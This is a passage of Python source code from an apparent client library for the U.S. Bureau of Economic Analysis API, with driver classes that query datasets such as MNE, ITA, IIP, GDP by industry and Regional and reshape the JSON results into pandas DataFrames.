indentTable = pd.DataFrame(list(zip(indentTable['LineNumber'],indentTable['SeriesCode'], indentTable['Indentations'])),columns=['LineNumber','SeriesCode','Indentations'])
df_output.reset_index(inplace=True)
df_output = df_output.merge(indentTable,on=['LineNumber','SeriesCode'],how='left') #merge will indentationTable, keep left cases that don't match with right
df_output['Indentations'].fillna(0,inplace=True)
df_output['LineDescription'] = df_output.apply(lambda x: '-'*x['Indentations'] + x['LineDescription'] , axis = 1)
df_output.drop('Indentations',axis=1,inplace=True)
df_output.set_index(['LineNumber', 'SeriesCode', 'LineDescription'],inplace=True)
except:
print('could not include indentations on table '+ tableName + ' returning table without indentation info')
return(df_output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"List of Datasets",
"method" :"datasetlist", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getGetParameterList():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def getParameterList(self,
datasetname,
payload = {'method': 'GetParameterList'},
verbose = False
):
'''
Get the list of parameter needed to get data from dataset.
Sample run -
getParameterList('NIPA')
Args:
datasetname (str): the name of the dataset eg, NIPA
payload (dict): the request payload that is basic to this driver; default to {'method': 'GetParameterList'}
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'datasetname':datasetname})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter'])
else:
self._cleanCode = "pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getGetParameterValues():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def getParameterValues(self,
datasetName,
parameterName,
payload = {'method': 'getParameterValues'},
verbose = False
):
'''
Get the list of values of a parameter of a database.
Sample run -
getParameterValues('NIPA','tableName')
Args:
datasetname (str): the name of the dataset eg, NIPA
parameterName (str): the name of the parameter you want to know the values of; eg 'tableName'
payload (dict): the request payload that is basic to this driver; default to {'method': 'getParameterValues'}
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'datasetname':datasetName})
query['params'].update({'parameterName':parameterName})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue'])
else:
self._cleanCode = "pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getMNE():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def MNE(self,
Frequency,
TableID,
DirectionOfInvestment,
OwnershipLevel,
NonbankAffiliatesOnly,
Classification,
Country,
Industry,
Year,
State,
SeriesID,
GetFootnotes,
Investment,
ParentInvestment,
payload = {'method': 'GETDATA', 'datasetname': 'MNE', 'ParameterName': 'TableID'},
outputFormat = "tablePretty",
verbose = False
):
'''
Query the MNE database
Args:
Frequency (str):
TableID (str):
DirectionOfInvestment (str):
OwnershipLevel (str):
NonbankAffiliatesOnly (str):
Classification (str):
Country (str):
Industry (str):
Year (str):
State (str):
SeriesID (str):
GetFootnotes (str):
Investment (str):
ParentInvestment (str):
payload (dict): default to {'method': 'GETDATA', 'datasetname': 'MNE', 'ParameterName': 'TableID'},
outputFormat (str): default to "tablePretty",
verbose (bool): default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({ "Frequency" : Frequency })
query['params'].update({ "TableID" : TableID })
query['params'].update({ "DirectionOfInvestment" : DirectionOfInvestment })
query['params'].update({ "OwnershipLevel" : OwnershipLevel })
query['params'].update({ "NonbankAffiliatesOnly" : NonbankAffiliatesOnly })
query['params'].update({ "Classification" : Classification })
query['params'].update({ "Country" : Country })
query['params'].update({ "Industry" : Industry })
query['params'].update({ "Year" : Year })
query['params'].update({ "State" : State })
query['params'].update({ "SeriesID" : SeriesID })
query['params'].update({ "GetFootnotes" : GetFootnotes })
query['params'].update({ "Investment" : Investment })
query['params'].update({ "ParentInvestment" : ParentInvestment })
query['params'].update(payload)
# TODO: try loading different frenquencies if no return
#
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData,outputFormat) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(self._lastLoad)
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData, outputFormat):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
else:
self._cleanCode = "pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
if outputFormat == "tablePretty":
df_output['LineNumber'] = pd.to_numeric(df_output['LineNumber'])
df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',','')))
meta = df_output.drop(['DataValue', 'TimePeriod'], axis=1).drop_duplicates()
meta = meta.set_index(['LineNumber', 'SeriesCode', 'LineDescription']).reset_index()
df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']]
df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first')
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output,'metadata':meta}
#update the code string:
self._cleanCode = self._cleanCode + "\ndf_output['LineNumber'] = pd.to_numeric(df_output['LineNumber']) \n"
self._cleanCode = self._cleanCode + "df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',',''))) \n"
self._cleanCode = self._cleanCode + "df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']] \n"
self._cleanCode = self._cleanCode + "df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first') \n"
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"List of Datasets",
"method" :"datasetlist", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getFixedAssets():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def fixedAssets(self,
TableName,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'FixedAssets'},
verbose = False
):
'''
Query the fixed assets database (API query)
Sample run -
fixedAssets('T10101','2010')
Args:
tableName (str): the name of the NIPA table, eg 'T10101'
Year (str): the year; eg 'X' for all years or '2018'
payload (dict): the request payload that is basic to this driver; default to {'method': 'GETDATA', 'datasetname': 'FixedAssets'}
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'TableName':TableName})
query['params'].update({'Year':Year})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getITA():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def ITA(self,
Indicator,
AreaOrCountry,
Frequency,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'ITA'},
verbose = False
):
'''
Query the ITA database (API query)
Sample run -
Args:
Indicator (str): the name of the NIPA table, eg 'T10101'
AreaOrCountry (str): the year; eg 'X' for all years or '2018'
Frequency (str): eg Q
Year (str): eg 2019
payload (dict): the request payload that is basic to this driver; default to {'method': 'GETDATA', 'datasetname': 'FixedAssets'}
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'Indicator':Indicator})
query['params'].update({'AreaOrCountry':AreaOrCountry})
query['params'].update({'Frequency':Frequency})
query['params'].update({'Year':Year})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
try: #one line datasets will need to be transformed in an array
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
except:
try:
self._cleanCode = "df_output = pd.DataFrame([retrivedData.json()['BEAAPI']['Results']['Data']])"
df_output = pd.DataFrame([retrivedData.json()['BEAAPI']['Results']['Data']])
except:
self._cleanCode = "df_output = pd.DataFrame([])"
df_output = pd.DataFrame([])
else:
try: #one line datasets will need to be transformed in an array
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
except:
try:
self._cleanCode = "df_output = pd.DataFrame([retrivedData.json()['BEAAPI']['Results']['Data']])"
df_output = pd.DataFrame([retrivedData.json()['BEAAPI']['Results']['Data']])
except:
self._cleanCode = "df_output = pd.DataFrame([])"
df_output = pd.DataFrame([])
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getIIP():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def IIP(self,
TypeOfInvestment,
Component,
Frequency,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'IIP'},
verbose = False
):
'''
Query the IIP database (API query)
Sample run -
Args:
TypeOfInvestment (str): eg
Component (str): eg
Frequency (str): eg Q
Year (str): eg 'X' for all or '2019'
payload (dict): request default {'method': 'GETDATA', 'datasetname': 'IIP'},
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'TypeOfInvestment':TypeOfInvestment})
query['params'].update({'Component':Component})
query['params'].update({'Frequency':Frequency})
query['params'].update({'Year':Year})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Data']) #NOTE: Not workings, works if use "Dimensions" instead of data, but not sure if this is the right thing.
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getGDPbyIndustry():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def GDPbyIndustry(self,
Industry,
TableID,
Frequency,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'GDPbyIndustry'},
verbose = False
):
'''
Query the GDPbyIndustry database (API query)
Sample run -
Args:
Industry (str): eg
TableID (str): eg
Frequency (str): eg Q
Year (str): eg 'X' for all or '2019'
payload (dict): request default {'method': 'GETDATA', 'datasetname': 'GDPbyIndustry'},
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'Industry':Industry})
query['params'].update({'TableID':TableID})
query['params'].update({'Frequency':Frequency})
query['params'].update({'Year':Year})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI'][0]['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results'][0]['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getRegionalIncome():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def RegionalIncome(self):
print("RegionalIncome and RegionalProduct were deprecated - use Regional instead - check https://apps.bea.gov/api/_pdf/bea_web_service_api_user_guide.pdf appendix I and J")
output = {'dataFrame':pd.DataFrame(['Dataset deprecated - use Regional'])}
return(output)
class getRegionalProduct():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def RegionalProduct(self):
print("RegionalIncome and RegionalProduct were deprecated - use Regional instead - check https://apps.bea.gov/api/_pdf/bea_web_service_api_user_guide.pdf appendix I and J")
output = {'dataFrame':pd.DataFrame(['Dataset deprecated - use Regional'])}
return(output)
class getInputOutput():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def InputOutput(self,
TableID,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'InputOutput'},
verbose = False
):
'''
Query the InputOutput database (API query)
Sample run -
Args:
TableID (str): eg
Year (str): eg 'X' for all or '2019'
payload (dict): request default {'method': 'GETDATA', 'datasetname': 'InputOutput'},
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'TableID':TableID})
query['params'].update({'Year':Year})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getUnderlyingGDPbyIndustry():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def UnderlyingGDPbyIndustry(self,
Industry,
TableID,
Frequency,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'UnderlyingGDPbyIndustry'},
verbose = False
):
'''
Query the UnderlyingGDPbyIndustry database (API query)
Sample run -
Args:
Industry (str): eg
TableID (str): eg
Frequency (str): eg Q
Year (str): eg 'X' for all or '2019'
payload (dict): request default {'method': 'GETDATA', 'datasetname': 'IIP'},
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({'Industry':Industry})
query['params'].update({'TableID':TableID})
query['params'].update({'Frequency':Frequency})
query['params'].update({'Year':Year})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results'][0]['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results'][0]['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getIntlServTrade():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def IntlServTrade(self,
TypeOfService,
TradeDirection,
Affiliation,
AreaOrCountry,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'IntlServTrade'},
verbose = False
):
'''
Query the IntlServTrade database (API query)
Sample run -
Args:
TypeOfService (str): eg
TradeDirection (str): eg
Affiliation (str): eg
AreaOrCountry (str): eg
Year (str): eg 'X' for all or '2019'
payload (dict): request default {'method': 'GETDATA', 'datasetname': 'IntlServTrade'},
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({"TypeOfService" : TypeOfService})
query['params'].update({"TradeDirection": TradeDirection})
query['params'].update({"Affiliation" : Affiliation})
query['params'].update({"AreaOrCountry" : AreaOrCountry})
query['params'].update({'Year':Year})
query['params'].update(payload)
retrivedData = requests.get(**query)
output = self._cleanOutput(query,retrivedData) #a dict of a df or df and meta (tablePretty)
if verbose == False:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = _getCode(query,self._connectionInfo.userSettings,self._cleanCode)
output['request'] = retrivedData
self._lastLoad = output
return(output)
def _cleanOutput(self,query,retrivedData):
if query['params']['ResultFormat'] == 'JSON':
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
else:
self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data']) #TODO: check this works
df_output.meta = ''
try:
df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
except:
pass
output = {'dataFrame':df_output}
return(output)
def clipcode(self):
_clipcode(self)
def _driverMetadata(self):
self.metadata = [{
"displayName":"Parameter of Dataset",
"method" :"GetParameterList", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getRegional():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
def Regional(self,
GeoFips,
LineCode,
TableName,
Year,
payload = {'method': 'GETDATA', 'datasetname': 'Regional'},
verbose = False
):
'''
Query the IntlServTrade database (API query)
Sample run -
Args:
GeoFips (str): eg
LineCode (str): eg
TableName (str): eg
Year (str): eg 'X' for all or '2019'
payload (dict): request default {'method': 'GETDATA', 'datasetname': 'Regional'},
verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
# TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
# load user preferences defined in userSettings, use suggested parameters, override w fun entry
query = deepcopy(self._baseRequest)
query['params'].update({"GeoFips" : GeoFips })
query['params'].update({"LineCode" : LineCode })
query['params'].update({"TableName" : TableName })
query['params'].update({'Year':Year})
